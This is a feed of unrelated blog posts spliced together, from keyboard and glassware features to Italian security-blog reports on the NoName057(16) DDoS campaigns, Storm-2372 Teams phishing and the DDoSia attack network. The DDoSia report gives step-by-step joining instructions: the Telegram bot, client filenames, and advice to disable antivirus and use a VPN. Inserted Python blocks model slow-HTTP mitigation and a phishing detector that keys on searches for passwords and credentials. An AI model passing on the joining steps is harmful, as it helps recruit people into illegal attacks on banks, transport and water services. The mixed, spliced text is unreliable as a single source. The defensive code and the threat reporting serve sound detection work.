In a follow-up post, [Artistic] does a great job outlining why you should always re-flash your new keyboards, especially the cheap ones. Although it may seem like a long shot, the threat is real, and he points to a couple examples of shenanigans, like keyloggers.
In a comment to his original post, [Artistic] explains that this particular Ali Corne comes with QMK Vial, which allows you to change the layout on a whim and have it update instantly. This means you don’t have to flash it, but you should; it’s easy to do, and you can either stick with Vial or move to straight QMK. He also outlines how it’s done.
The Centerfold: the Hackaday Every Day Carry
Image by [devpew] via reddit
Did I do it? Did I find the ideal Hackaday centerfold? I’ll totally forgive the lack of desk mat, or just pretend that it’s really big and resembles the surface of the moon.
So what we’ve got here is a Skeletyl keyboard along with some friends, like a Flipper Zero and a Pwnagotchi. Who knows why the knife, but then again knives are useful I suppose. I really dig the cute little trackball, though it seems like it would be fiddly to actually use. This series of posts by [devpew] kicked off a whole everyday carry thing on reddit, which was enjoyable.
Do you rock a sweet set of peripherals on a screamin’ desk pad? Send me a picture along with your handle and all the gory details, and you could be featured here!
Historical Clackers: My Own Personal Holy Grail
So your girl did some wheeling and dealing this weekend and traded four machines plus some cash for her holy grail typewriter, a blue correcting IBM Selectric II. She also got a typewriter table and a dust cover in the deal. It was quite a weekend, really. Got a surprise band saw for late-Christmas, too.
Here’s the best part. When I bought Selectric Blue (it was between that and calling her “Bertha the Bluegirl”), she was in a tan case. A grail for sure, but not the holy grail. I was happy enough to get a working II, mind you. But on a whim, I asked the guy if he ever saw any green ones come across his bench. I don’t know why I didn’t ask about blue; it’s my favorite color after all. But then he tells me he has blue and black cases available right then, though they probably wouldn’t fit the machine I bought. But then we figured out that they did, and I met up with him the following day to turn her blue. Now she’s all I ever wanted. I even got the type ball of my dreams — Adjutant.
(Note: I still love my IBM Wheelwriter 5, which is basically the 80s version of the Selectric. I just love them differently, is all, like having a pair of cats. The Wheelwriter is plastic, for one thing, and the Selectric is almost solid steel. But the Wheelwriter is so snappy and types so crisply, so…)
So, you probably want to know things about the Selectric II. It is the sequel to the Selectric I, which was only called the I after the II came out. The original Selectric wowed the world with its spinning golf ball type element, which replaced the swinging type bars of most typewriters and hearkened back to. My machine is in a way the Selectric II.5, as the first IIs introduced in 1971 didn’t have correction built in — that came along in 1973.
So much has been written about Selectrics. But did you know they were part of Cold War-era espionage?
ICYMI: Casio Calculator Gets New Keyboard
Image by [Poking Technology] via YouTube
Do you recall the 1985 Casio FX-451 calculator? It was a pocket-sized foldout scientific wonder, with both hard keys and a set of membrane keys built into the case.
[Poking Technology] had one with a broken membrane keyboard and decided to upgrade it to a mechanical keyboard. Of course, it’s no longer pocket-sized, but who’s counting?
If you like build detail, you’re in for a treat, because there are two videos covering the entire process. It was a challenge to disassemble the thing, and soldering wires to the keyboard was no picnic, either — some lines are on the back of PCB and go under the main IC on their way to the top. Excellent work, [Poking]!
Got a hot tip that has like, anything to do with keyboards? Help me out by sending in a link or two. Don’t want all the Hackaday scribes to see it? Feel free to email me directly.
Decoy Killswitch Triggers Alarm Instead
There are a few vehicles on the road that are targeted often by car thieves, whether that’s because they have valuable parts, the OEM security is easily bypassed, or even because it’s an antique vehicle that needs little more than a screwdriver to get started. For those driving one of these vehicles an additional immobilization feature is often added, like a hidden switch to deactivate the fuel pump. But, in the continual arms race between thieves and car owners, this strategy is easily bypassed. [Drive Science] hopefully took one step ahead though and added a decoy killswitch instead which triggers the alarm.
The decoy switch is placed near the steering column, where it would easily be noticed by a thief. Presumably, they would think that this was the reason the car wouldn’t start and attempt to flip the switch and then start the ignition. But secretly, the switch activates a hidden relay connected to the alarm system, so after a few seconds of the decoy switch activating, the alarm will go off regardless of the position of this switch. This build requires a lot of hiding spots to be effective, so a hidden method to deactivate the alarm is also included which resets the relay, and another killswitch which actually disables the fuel pump is also added to another secret location in the car.
As far as “security through obscurity” goes, a build like this goes a long way to demonstrate how this is an effective method in certain situations. All that’s generally needed for effective car theft prevention is to make your car slightly more annoying to steal than any other car on the road, and we think that [Drive Science] has accomplished that goal quite well. Security through obscurity is generally easily broken on things deployed on a much larger scale. A major European radio system was found to have several vulnerabilities recently thanks in part to the designers hoping no one would look too closely at them.
OpenAI unlocks ChatGPT: it can now generate erotic and violent content
OpenAI has changed its content restriction policy for ChatGPT, allowing the generation of erotic and violent content in “appropriate” contexts. The new version of the “Model Spec” document, published on Wednesday, states that the AI can create such material without warnings if it is used in scientific, historical, journalistic or other legitimate contexts.
The update builds on work begun in May 2024, when OpenAI first announced its intention to explore giving users more flexible settings for generating content in this category.
Part of ChatGPT's new policy on erotic or violent content
Under the new rules, only certain forms of content remain prohibited, such as descriptions of illegal and non-consensual activities. However, under certain conditions, elements of eroticism and violence are permitted in text, audio or even image format.
Reddit users have already noticed the loosening of the filters. Some managed to create explicit or violent scenarios without any warning, which was previously impossible. OpenAI stresses that its usage policy remains in force: creating sexual content aimed at minors is strictly prohibited.
In the past, ChatGPT often refused to generate material on the principle of “care for the user”, which created difficulties for specialists working with forensic reports, legal documents or medical texts. OpenAI has now recognized the need for a less censored version of ChatGPT that lets users get the information they need without artificial restrictions.
The company says the decision was made after numerous responses from the community in support of the idea of an “adult mode”. Although this mode is not a separate option, OpenAI's updated policy gives users more flexibility.
OpenAI CEO Sam Altman has previously voiced the need for such a step. The company has now officially implemented more flexible restrictions, although alternative AI models offering complete freedom, including locally run LLMs, have long been on the market.
OpenAI's updated rules divide sensitive content into three categories. Prohibited content covers only material relating to minors, although discussion of such topics is allowed in educational and medical contexts. Restricted content includes dangerous information, such as instructions for building weapons, as well as personal information. Sensitive content can now be generated if it has an educational, historical or artistic justification.
Although some restrictions remain, OpenAI is taking a clear step toward greater freedom in the use of artificial intelligence.
The article "OpenAI unlocks ChatGPT: it can now generate erotic and violent content" comes from il blog della sicurezza informatica.
The “Unbreakable” Beer Glasses Of East Germany
We like drinking out of glass. In many ways, it’s an ideal material for the job. It’s hard-wearing, and inert in most respects. It doesn’t interact with the beverages you put in it, and it’s easy to clean. The only problem is that it’s rather easy to break. Despite its major weakness, glass still reigns supreme over plastic and metal alternatives.
But what if you could make glassware that didn’t break? Surely, that would be a supreme product that would quickly take over the entire market. As it turns out, an East German glassworks developed just that. Only, the product didn’t survive, and we lumber on with easily-shattered glasses to this day. This is the story of Superfest.
Harder, Better, Glasser, Stronger
It all started in the German Democratic Republic in the 1970s; you might know it better as East Germany. The government’s Council of Ministers deemed it important to develop higher-strength glass. Techniques for the chemical strengthening of glass were already known by the 1960s, and work on developing the technology further began in earnest.
The patent goes into great detail on design of the production line, indicating how perforated plates create a “rain” of molten potassium salt upon the glassware. Credit: patent
These efforts came to fruition in the form of a patent filed on the 8th of August, 1977. It was entitled Verfahren und Vorrichtung Zur Verfestigung Von Glaserzeugnissen Durch Ioenenaustausch—or, translated to English—Process and Apparatus for Strengthening Glassware By Ion Exchange. The patent regarded an industry-ready process, which was intended for use in the production of hollow glass vessels—specifically, drinking glassware.
The researchers understood that glasses typically broke in part due to microscopic cracks in the material, which are introduced in the production process. These microcracks could be mitigated by replacing the sodium ions in the surface of the glass with larger potassium ions. The larger ions thus cause a state of compression in the surface layer. Glass is far more capable of resisting compression rather than tension. The high compressive stresses baked into the material help resist tension forces that occur during impact events, thus making the material far more resistant to breakage.
The process of exchanging sodium ions in the glass with potassium ions was simple enough. The patent outlined a process for raining down a molten potassium salt solution onto the glassware, which would harden the outside surface significantly. This process was chosen for multiple reasons. It was desired to avoid immersing glassware into a huge bath of molten potassium salt, as the large bath of hot material would present safety hazards. There were also concerns that excessive time spent at high temperatures following immersion would lead to a relaxation of the crucial compressive stresses that built up in the glass from the ion exchange. Interior surfaces of the glassware could also be hardened by rotating the glasses on a horizontal axis under the “salt rain” so they were also exposed to the potassium salt to enable the ion exchange.
While the design of apparatus to strengthen drinking glassware is novel, the fundamental chemical process is not dissimilar to that used in the production of Gorilla Glass. Credit: patent
Recognizing the value of this patent, the Council of Ministers fast-tracked the technology into commercial production at the Sachsenglas Schwepnitz factory. The glassware was originally named CEVERIT, which was a portmanteau of the German words chemisch verfestigt—meaning “chemically solidified.” It also wore the name CV-Glas for the same reason. Production began in earnest in 1980, primarily centered around making beer glasses for hospitality businesses in East Germany—bars, restaurants, and the like. The glass instantly lived up to its promise, proving far more durable in commercial use. While not completely indestructible, the glasses were lasting ten to fifteen times longer than traditional commercial glassware.
A Superfest glass marked for 250 mL. Today, the only real way to source Superfest glassware is to buy used. Much remains in commercial use. Credit: Kaethe17, CC BY-SA 4.0
Despite the political environment of the time, there were hopes to expand sales to the West. On the urging of sales representative Eberhard Pook, the glasses were referred to by the name Superfest. The aim was to avoid negative connotations of “chemicals” in the name when it came to drinking glasses. Despite efforts made at multiple trade fairs, however, international interest in the tough glassware was minimal. Speaking to ZEITMagazin in 2020, Pook noted the flat response from potential customers. “We built a wall where we stacked the glasses… Look at it, it’s unbreakable!” says Pook, translated from the original German. “No reaction.” He was told that the material’s strength was also a great weakness from a sales perspective. “At Coca Cola, for example, they said, why should we use a glass that doesn’t break, we make money with our glasses,” he explained. “The dealers understandably said, who would cut off the branch they’re sitting on?”
Production nevertheless continued apace, with 120 million glasses made for the domestic market. Hardened glassware was manufactured in all shapes and sizes, covering everything from vases to tea cups and every size of beer glass. Stock eventually began piling up at the factory, as restaurants and bars simply weren’t ordering more glassware. Their chemically-strengthened glasses were doing exactly what they were supposed to do, and replacements weren’t often necessary.
Superfest glass was also used in the production of vases and other hollow glass items. Credit: Mernst1806/TeKaBe, CC BY-SA 4.0
Regardless, the future was unkind to Superfest. Urban legend says that the reunification of Germany was the beginning of the end, but it’s not entirely true. As covered by ZEITMagazin, the production of Superfest glassware was ended in July 1990 because it simply wasn’t profitable for the company. Production of other glassware continued, but the chemically-hardened line was no more. The patent for the process was allowed to lapse in 1992, and pursued no more.
The question remains why we don’t have chemically-hardened glassware today. The techniques behind Superfest are scarcely different to those used in Gorilla Glass or other chemically-strengthened glasses. The manufacturing process is well-documented, and the world is full of factories that ignore any concept of intellectual property if there was even an issue to begin with. Indeed, a German crowdfunding effort even attempted to replicate the material—only to fall into insolvency this year.
It seems that either nobody can make stronger drinking glasses, or nobody wants to—perhaps because, as Superfest seemed to indicate—there simply isn’t any money in it in the long term. It’s a shame, because the world demands nice things—and that includes beer glasses that last seemingly forever.
Featured image: “Superfest glasses in five sizes” by Michael Ernst
The US just blew a hole in combatting 'hybrid warfare'
HELLO. THIS IS DIGITAL POLITICS. I'm Mark Scott, and I bring you actual scenes from my attempts to coordinate with colleagues via Microsoft's SharePoint. True story.
— The pending peace negotiations over the Ukraine-Russia war demonstrate a major failure in confronting so-called 'hybrid warfare' when politicians play directly into Kremlin narratives.
— The recent AI Action Summit in France made it clear that countries' priorities are shifting from safety to economic development.
— Fact-checking organizations represent a significant source for crowdsourced 'community notes' on social media platforms.
Let's get started:
Parametric Design Process Produces Unique Speakers
When building one-off projects, it’s common to draw up a plan on a sheet of paper or in CAD, or even wing it and hope for the best outcome without any formal plans. Each of these design philosophies has its ups and downs but both tend to be rigid, offering little flexibility as the project progresses. To solve this, designers often turn to parametric design where changes to any part of the design are automatically reflected throughout the rest, offering far greater flexibility while still maintaining an overall plan. [Cal Bryant] used this parametric method to devise a new set of speakers for an office, with excellent results.
The bulk of the speakers were designed with OpenSCAD, with the parametric design allowing for easy adjustments to accommodate different drivers and enclosure volumes. A number of the panels of the speakers are curved as well, which is more difficult with traditional speaker materials like MDF but much easier with this 3D printed design. There were a few hiccups along the way though; while the plastic used here is much denser than MDF, the amount of infill needed to be experimented with to achieve a good finish. The parametric design paid off here as well as the original didn’t fit exactly within the print bed, so without having to split up the print the speakers’ shape was slightly tweaked instead. In the end he has a finished set of speakers that look and sound like a high-end product.
There are a few other perks to a parametric design like this as well. [Cal] can take his design for smaller desk-based speakers and tweak a few dimensions and get a model designed to stand up on the floor instead. It’s a design process that adds a lot of options and although it takes a bit more up-front effort it can be worth it while prototyping or even for producing different products quickly. If you want to make something much larger than the print bed and slightly changing the design won’t cut it, [Cal] recently showed us how to easily print huge objects like arcade cabinets with fairly standard sized 3D printers.
Pro-Russian hackers NoName057(16) open a Telegram channel in Italian
Today, the pro-Russian hacker group NoName057(16) launched a new Italian-language Telegram channel. The channel has already published several posts about Italian political news, selected by the group as examples of alleged hostility toward Russia. This new initiative marks an expansion of their propaganda campaign, aimed directly at the Italian public.
Long active on the cyber-activism scene, NoName057(16) has stood out for a series of DDoS (Distributed Denial of Service) attacks against government and institutional sites and private companies in countries deemed hostile to Russia.
The opening of a Telegram channel in Italian suggests growing interest in our country, both as a target for cyberattacks and as a potential recruitment pool for the DDoSia project.
Who are the pro-Russian hacktivists of NoName057(16)?
NoName057(16) is a pro-Russian hacktivist group active since March 2022, shortly after Russia's invasion of Ukraine. The collective gained notoriety for its DDoS campaigns against critical infrastructure and government institutions in several countries, with the aim of sabotaging services and spreading its propaganda.
Their attacks have targeted nations such as Ukraine, the United States, the United Kingdom, Poland, the Czech Republic, Estonia and Italy, that is, countries that have expressed support for Ukraine in the war against Russia. NoName057(16) describes itself as a patriotic group that defends Russia's interests and fights against “Western propaganda”.
The NoName057(16) manifesto
The group has published an ideological manifesto, available on Telegram, in which it sets out its worldview and justifies its actions. Some key points emerge from the text:
- Internazionalismo – crediamo fermamente nella grandezza della Russia nell’arena internazionale. La nostra madrepatria è un baluardo di giustizia, che si ribella alle bugie e all’ipocrisia dell’Occidente collettivo. I combattenti del nostro esercito informatico possono vivere in paesi diversi, ma devono rispettare la Russia.
- Giustizia – uno dei nostri slogan è: “La giustizia non ha nome. “NoName”. Siamo pronti a venire in aiuto delle persone che la pensano come noi in qualsiasi parte del mondo e a fare ogni tentativo per ripristinare la giustizia e punire i loro trasgressori. Aiutiamo coloro che sono più deboli e impariamo da coloro che sono più forti.
- Unità – non ci importa che colore abbia la tua pelle, forma degli occhi, lingua o del luogo di residenza abbiano i nostri combattenti. Una cosa è importante: che siano persone con idee simili alle nostre e che condividano i valori tradizionali della Russia. La parola “russo” ha cessato di essere una nazionalità. “Russo” è ora un’ideologia. L’ideologia di un giusto ordine mondiale e della libertà.
The tone of the manifesto is strongly propagandistic, with rhetoric that aims to justify the group's actions as a form of resistance against a hypothetical Western aggression.
The DDoSia project: the pro-Russian cyber army
One of NoName057(16)'s main tools is the DDoSia project, which makes it possible to coordinate large-scale DDoS attacks against websites deemed hostile to Russia.
DDoSia is a platform based on recruiting volunteers, who can download software provided by the group to take an active part in the attacks. The more a user contributes to the attacks, the more they earn in cryptocurrency. This reward model has allowed the group to build a network of cyber-mercenaries who, for payment, carry out attacks against selected targets.
What sets DDoSia apart is its decentralized approach: anyone can take part, without needing significant technical skills. The project is structured to be accessible to a broad audience, making wide mobilization possible against the targets named by the group.
A new front for cyber propaganda
The opening of the new Italian-language Telegram channel strengthens the hypothesis of a growing NoName057(16) threat on Italian territory, suggesting an attempt to expand propaganda and recruitment in Italy.
With the launch of this Italian-language Telegram channel, NoName057(16) no longer limits itself to hitting institutional targets with DDoS attacks, but is trying to influence public opinion directly.
Spreading content in the local language allows them to:
- Legitimize their narrative in the eyes of an Italian audience, trying to attract sympathizers.
- Spread disinformation on political and international topics, influencing public debate.
- Recruit new members for the DDoSia project or for other activities linked to their cause.
In recent months, DDoS attacks carried out by NoName have already targeted several Italian sites, including government institutions and strategic companies. Italian authorities and cybersecurity experts must monitor these developments closely, because more active involvement of NoName057(16) in Italy could:
- Increase the number of attacks against Italian sites in the coming months.
- Expose Italian users to recruitment attempts, especially on Telegram.
- Encourage the spread of disinformation within the Italian digital ecosystem.
NoName057(16) has proven over time to be one of the most active, dangerous and long-lived pro-Russian hacktivist groups, with a strategy that combines cyberattacks and digital propaganda. The opening of an Italian-language Telegram channel represents a significant step in its expansion, indicating growing interest in our country.
The challenge now is to understand how much this initiative can influence the Italian landscape and how institutions can counter the group's activity, protecting both digital infrastructure and public debate from its propaganda.
The article “Pro-Russian hackers of NoName057(16) open a Telegram channel in Italian” comes from il blog della sicurezza informatica.
USB Stick Hides Large Language Model
Large language models (LLMs) are all the rage in the generative AI world these days, with the truly large ones like GPT, LLaMA, and others using tens or even hundreds of billions of parameters to churn out their text-based responses. These typically require glacier-melting amounts of computing hardware, but the “large” in “large language models” doesn’t really need to be that big for there to be a functional, useful model. LLMs designed for limited hardware or consumer-grade PCs are available now as well, but [Binh] wanted something even smaller and more portable, so he put an LLM on a USB stick.
This USB stick isn’t just a jump drive with a bit of memory on it, though. Inside the custom 3D printed case is a Raspberry Pi Zero W running llama.cpp, a lightweight, high-performance version of LLaMA. Getting it on this Pi wasn’t straightforward at all, though, as the latest version of llama.cpp is meant for ARMv8 and this particular Pi was running the ARMv6 instruction set. That meant that [Binh] needed to change the source code to remove the optimizations for the more modern ARM machines, but with a week’s worth of effort spent on it he finally got the model on the older Raspberry Pi.
Getting the model to run was just one part of this project. The rest of the build was ensuring that the LLM could run on any computer without drivers and be relatively simple to use. By setting up the USB device as a composite device which presents a filesystem to the host computer, all a user has to do to interact with the LLM is to create an empty text file with a filename, and the LLM will automatically fill the file with generated text. While it’s not blindingly fast, [Binh] believes this is the first plug-and-play USB-based LLM, and we’d have to agree. It’s not the least powerful computer to ever run an LLM, though. That honor goes to this project which is able to cram one on an ESP32.
NoName057(16) Hackers Against Sergio Mattarella: DDoS Attacks Flood Italy
The NoName057(16) hackers have resumed their hostile activity against several Italian targets through Distributed Denial-of-Service (DDoS) attacks. This time the retaliation is for remarks by President Sergio Mattarella. The hacktivists posted the following comment on their Telegram channel:
Italian President Sergio Mattarella compared Russia to the Third Reich, provoking a harsh reaction from the Russian Foreign Ministry. Moscow has already promised that such statements will not go without consequences🤬
Italy is receiving DDoS missiles from us at its websites for such comparisons by the Russophobe Mattarella
NoName057(16) is a hacker group that declared itself in March 2022 in support of the Russian Federation. It has claimed responsibility for cyberattacks on countries such as Ukraine, the United States and various other European countries, including Italy.
These attacks are typically carried out against government agencies, media outlets and the websites of private companies. These are the sites that, according to NoName057(16), went down today.
❌Acqua Novara - water services
check-host.net/check-report/232ca8fbk19a
❌Acque Veronesi, integrated water management company
check-host.net/check-report/232caa84k651
❌Intesa Sanpaolo (dead on ping)
check-host.net/check-report/232cabb5k642
❌Intesa Sanpaolo S.p.A.
check-host.net/check-report/232cad71k36e
❌Intesa Sanpaolo S.p.A.
check-host.net/check-report/232caf32k392
❌Authorization via the Intesa Sanpaolo portal
check-host.net/check-report/232cb039k5e2
❌Intesa Sanpaolo Real Estate
check-host.net/check-report/232cb242kdd3
❌APS - Siena bus company
check-host.net/check-report/232cb5a6k3c9
❌ATAP - Turin bus company (dead on ping)
check-host.net/check-report/232cb7bfke8c
❌Malpensa - Milan airport serving international and domestic flights (dead on ping)
check-host.net/check-report/232cba2eka0a
What is a Distributed Denial of Service attack
A DDoS (Distributed Denial of Service) attack is a type of cyberattack in which a large volume of requests is sent to a server or website from many different machines at the same time, in order to overload the server's resources and make it inaccessible to its legitimate users.
These requests can be sent by a large number of malware-infected devices controlled by a criminal organization, by a network of compromised computers called a botnet, or by other sources of illegitimate traffic. The goal of a DDoS attack is often to disrupt the online activities of an organization or company, or to force it to pay a ransom to restore access to its online services.
DDoS attacks can cause significant damage to an organization's online activities, including prolonged downtime, data loss and reputational damage. To protect themselves, organizations can adopt security measures such as limiting network traffic from suspicious sources, using DDoS protection services, or designing systems that are resilient to DDoS attacks.
It should be noted that DDoS attacks, although they cause a temporary disruption of service, do not affect the Confidentiality or Integrity of data, only its availability. Once the DDoS attack is over, the site therefore resumes working exactly as before.
What is cyber hacktivism
Cyber hacktivism is a movement that uses computer hacking techniques to promote a political or social message. Hacktivists use their technical skills to carry out online actions such as unauthorized access to websites or computer networks, the release of confidential information, or the blocking of a given organization's online services.
The goal of cyber hacktivism is to raise public awareness of important issues such as freedom of expression, privacy, freedom of access to information or the fight against online censorship. Hacktivists may belong to organized groups or act individually, but in both cases they use their technical skills to create social and political impact.
It is important to stress that cyber hacktivism should not be confused with cybercrime, that is, the practice of using hacking techniques for illicit purposes such as stealing personal or financial data. While cybercrime is illegal, cyber hacktivism may be considered legitimate if it aims to bring important issues to public attention and to foster democratic debate. Nevertheless, hacktivists' actions can have legal consequences, and hacktivists can be prosecuted for their actions.
Who are the NoName057(16) hacktivists
NoName057(16) is a hacker group that declared itself in March 2022 in support of the Russian Federation. It has claimed responsibility for cyberattacks on countries such as Ukraine, the United States and various other European countries. These attacks are typically carried out against government agencies, media outlets and the websites of private companies.
Information about the attacks carried out by NoName057(16) is published in the Telegram channel of the same name. According to Ukrainian media, the group is also involved in sending threatening letters to Ukrainian journalists. The hackers gained their popularity during a series of massive DDoS attacks on Lithuanian websites.
The DDoS attack techniques used by the group are mixed, with a preference for the “Slow HTTP attack”.
The “Slow HTTP Attack” technique
The “Slow HTTP Attack” (full article at this link) is a type of cyberattack that exploits a vulnerability of web servers. In this type of attack, the attacker sends many incomplete HTTP requests to the target server, with the aim of keeping connections to the server occupied for a prolonged period and preventing the site's legitimate users from getting access.
Specifically, the Slow HTTP attack exploits the way the HTTP protocol works, which provides that an HTTP request is made up of three parts: the request, the response and the message body. The attacker sends many incomplete HTTP requests in which the message body is sent very slowly or incompletely, tying up the connection and preventing the server from freeing the resources it needs to serve other requests.
This type of attack is particularly difficult to detect and mitigate, because the requests look legitimate but take an excessive amount of time for the server to process. Slow HTTP attacks can cause very slow response times or server downtime, making it impossible to reach the online services hosted on that system.
To protect themselves from these attacks, organizations can implement security solutions such as web application firewalls (WAF), limits on connections to the server, and DDoS detection and mitigation systems.
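The connection-limiting mitigation above can be made concrete with a read deadline tied to a minimum data rate. The following is an added example, not part of the original article: it models that deadline in Python over constructed connection traces and compares it with a plain per-read idle timer; the policy values, trace data and function names are illustrative assumptions.

```python
from dataclasses import dataclass

# A trace is a list of (seconds_since_accept, bytes_read) events for one connection.


@dataclass(frozen=True)
class MinRatePolicy:
    initial_timeout: float  # seconds allowed before any data has arrived
    max_timeout: float      # hard ceiling for reading the whole request
    min_rate: int           # each `min_rate` bytes received buys one more second

    def deadline(self, received: int) -> float:
        return min(self.initial_timeout + received / self.min_rate, self.max_timeout)


def held_idle_timer(trace, expected, idle_timeout):
    """Weak setting: the timer restarts on every read, however small."""
    last, received = 0.0, 0
    for t, n in trace:
        if t - last > idle_timeout:
            return last + idle_timeout, "dropped"
        last, received = t, received + n
        if received >= expected:
            return t, "completed"
    return last + idle_timeout, "dropped"      # sender went silent


def held_min_rate(trace, expected, policy):
    """Hardened setting: the deadline only moves when real data volume arrives."""
    received = 0
    for t, n in trace:
        limit = policy.deadline(received)
        if t > limit:
            return limit, "dropped"
        received += n
        if received >= expected:
            return t, "completed"
    return policy.deadline(received), "dropped"


# Constructed traces: (read events, number of bytes the request declares).
TRACES = {
    "fast_client": ([(0.05, 1000), (0.20, 1000)], 2000),
    "slow_but_honest": ([(float(s), 2048) for s in range(1, 26)], 51200),
    "trickle": ([(9.0 * k, 1) for k in range(1, 11)], 10000),
}
POLICY = MinRatePolicy(initial_timeout=10, max_timeout=30, min_rate=500)  # assumed values


def compare(idle_timeout=10.0, policy=POLICY):
    """Return (seconds the worker was held, outcome) per trace and per setting."""
    rows = {}
    for name, (trace, expected) in TRACES.items():
        rows[name] = {
            "idle_timer": held_idle_timer(trace, expected, idle_timeout),
            "min_rate": held_min_rate(trace, expected, policy),
        }
    return rows


def worker_seconds(connections, idle_timeout=10.0, policy=POLICY):
    """Total worker time consumed by `connections` copies of the trickle trace."""
    trace, expected = TRACES["trickle"]
    return {
        "idle_timer": connections * held_idle_timer(trace, expected, idle_timeout)[0],
        "min_rate": connections * held_min_rate(trace, expected, policy)[0],
    }


if __name__ == "__main__":
    for name, row in compare().items():
        print(name, row)
    print(worker_seconds(200))
```

The slow but honest upload completes under both settings, while the trickling connection is released after about 10 seconds instead of 100. The `max_timeout` ceiling is a trade-off: genuine uploads that need longer than it allows are cut off as well.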
The article “NoName057(16) Hackers Against Sergio Mattarella: DDoS Attacks Flood Italy” comes from il blog della sicurezza informatica.
Microsoft Teams Under Attack: Russian Hackers Steal Credentials with Fake Invitations
The Microsoft Threat Intelligence Center (MSTIC) has uncovered a sophisticated ongoing phishing campaign that abuses Microsoft Teams invitations to gain unauthorized access to user accounts and sensitive data.
The campaign, attributed to the group Storm-2372, has been active since August 2024 and has targeted a wide range of sectors, including government, defense, healthcare, technology and energy in Europe, North America, Africa and the Middle East.
Storm-2372's method relies on device code phishing, a technique in which the threat actor uses fake meeting invitations to trick users into handing over authentication tokens.
After receiving an invitation, unsuspecting users are redirected to a legitimate authentication page and asked to enter a device code generated by the attacker.
The stolen tokens allow the attacker to access the victim's accounts without needing a password, giving access to sensitive email, cloud storage and other services.
Once the initial compromise is established, Storm-2372 has been observed moving laterally within compromised networks by sending further phishing emails from victims' accounts.
The attacker has also used Microsoft's Graph API to search for sensitive information, extracting data using keywords such as “password”, “admin” and “credentials”.
Recent updates to the group's tactics include the use of the Microsoft Authentication Broker client ID to register actor-controlled devices, enabling persistent access and further escalation.
Microsoft has linked Storm-2372 to Russian state interests on the basis of its attack patterns and operational techniques.
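The behaviours listed above (a device code sign-in followed by device registration, keyword searches and mail sent from the victim's account) lend themselves to a simple correlation rule. The following is an added example, not taken from Microsoft or from the original article: it triages constructed events in Python. The event field names, the one-hour window, the bulk-mail threshold and the client ID placeholder are all assumptions rather than a real log schema.

```python
from datetime import datetime, timedelta

WINDOW = timedelta(hours=1)                       # assumed correlation window
KEYWORDS = ("password", "admin", "credentials")   # search terms named in the article
BROKER_CLIENT_ID = "<auth-broker-client-id>"      # placeholder, not a real value


def ev(time, user, kind, **fields):
    """Build one constructed event record."""
    return {"time": datetime.fromisoformat(time), "user": user, "kind": kind, **fields}


# Constructed events; field names are simplified assumptions, not a real log schema.
EVENTS = [
    ev("2025-02-14T09:00:00", "alice", "signin", protocol="deviceCode", ip="198.51.100.7"),
    ev("2025-02-14T09:05:00", "bob", "signin", protocol="interactive", ip="192.0.2.10"),
    ev("2025-02-14T09:06:00", "bob", "search", query="quarterly report"),
    ev("2025-02-14T09:10:00", "alice", "device_registration", client_id=BROKER_CLIENT_ID),
    ev("2025-02-14T09:12:00", "alice", "search", query="admin password list"),
    ev("2025-02-14T09:20:00", "alice", "mail_sent", recipients=40, internal=True),
    ev("2025-02-14T10:00:00", "carol", "signin", protocol="deviceCode", ip="192.0.2.44"),
    ev("2025-02-14T08:00:00", "dave", "signin", protocol="deviceCode", ip="203.0.113.9"),
    ev("2025-02-14T11:30:00", "dave", "device_registration", client_id=BROKER_CLIENT_ID),
]


def follow_on(event):
    """Return a reason string if the event matches a post-compromise behaviour."""
    kind = event["kind"]
    if kind == "device_registration" and event.get("client_id") == BROKER_CLIENT_ID:
        return "device registered via authentication broker client"
    if kind == "search":
        hits = [k for k in KEYWORDS if k in event.get("query", "").lower()]
        if hits:
            return "sensitive search: " + ",".join(hits)
    if kind == "mail_sent" and event.get("internal") and event.get("recipients", 0) >= 20:
        return "bulk internal mail"               # threshold of 20 is an assumption
    return None


def triage(events, window=WINDOW):
    """Flag every device code sign-in; escalate when follow-on activity is close in time."""
    ordered = sorted(events, key=lambda e: e["time"])
    findings = []
    for i, start in enumerate(ordered):
        if start["kind"] != "signin" or start.get("protocol") != "deviceCode":
            continue
        reasons = []
        for later in ordered[i + 1:]:
            if later["time"] - start["time"] > window:
                break                             # sorted input: nothing later can match
            if later["user"] == start["user"]:
                reason = follow_on(later)
                if reason:
                    reasons.append(reason)
        findings.append({
            "user": start["user"],
            "ip": start["ip"],
            "severity": "high" if reasons else "review",
            "reasons": reasons,
        })
    return findings


if __name__ == "__main__":
    for finding in triage(EVENTS):
        print(finding)
```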
The article “Microsoft Teams Under Attack: Russian Hackers Steal Credentials with Fake Invitations” comes from il blog della sicurezza informatica.
DDoSia: How Russia Recruits Cyber-Mercenaries on Telegram and Pays Them in Cryptocurrency
In recent years, the conflict between Russia and its opponents has not been confined to the traditional battlefield but has increasingly involved cyberspace. One of the most active groups in this cyber war is NoName057(16), known for its DDoS operations against government websites and critical infrastructure in countries deemed hostile to Russia. Prominent among its initiatives is the DDoSia Project, a platform that mobilizes volunteers to conduct large-scale DDoS attacks.
The project, however, is not a simple network of volunteers: it follows a hierarchical structure, recruiting and paying cyber-mercenaries of any level of experience, with no selection based on skills or technical background. Anyone can take part, regardless of their knowledge of computing, which leads to mass participation by inexperienced users who carry out the attacks without fully understanding the legal and operational risks. This indiscriminate recruitment policy turns DDoSia into a genuinely heterogeneous digital army, fed by individuals who are often unaware of what they are doing but who amplify the impact of the attacks.
Why these languages in particular?
An interesting element is the choice of languages supported by the project: Russian, English, Spanish and, surprisingly, Italian. This could indicate specific attention to certain countries and communities, suggesting that Italy is considered a strategic target with geopolitical interests or that there is a significant number of Italian collaborators within it.
How the DDoSia Project works
DDoSia is a crowdsourced DDoS project in which anyone can take part in the attacks simply by registering via Telegram and downloading a dedicated client. The process is structured to make joining simple but effective:
- Registration through the Telegram bot @Not_Realy_DDoSia_Bot with the /start command.
- Obtaining the Client ID, which is needed to start the attacks.
- Downloading the client for one's operating system.
- Configuring and starting the client, with the advice to disable antivirus so that the software is not blocked.
- Using a VPN to hide one's identity and increase the effectiveness of the attacks (not required in Russia).
Client distribution and architecture
The DDoSia client is a tool that lets users take part in the attacks in a fully automated way. The software connects to the command-and-control (C2) server of the NoName057(16) group, receiving the targets to hit in real time and managing the malicious traffic in a distributed manner.
The clients are distributed directly in the Telegram groups and are available, among many others, for:
- Windows: `d_win_x64.exe`, `d_win_x32.exe`, `d_win_arm64.exe`
- macOS: `d_mac_x64`, `d_mac_arm64`
- Linux: `d_lin_x64`, `d_lin_x32`, `d_lin_arm`
- Android: on mobile devices with ARM architecture
Supported attack vectors
- HTTP(S) flood: saturation of web servers with GET/POST requests.
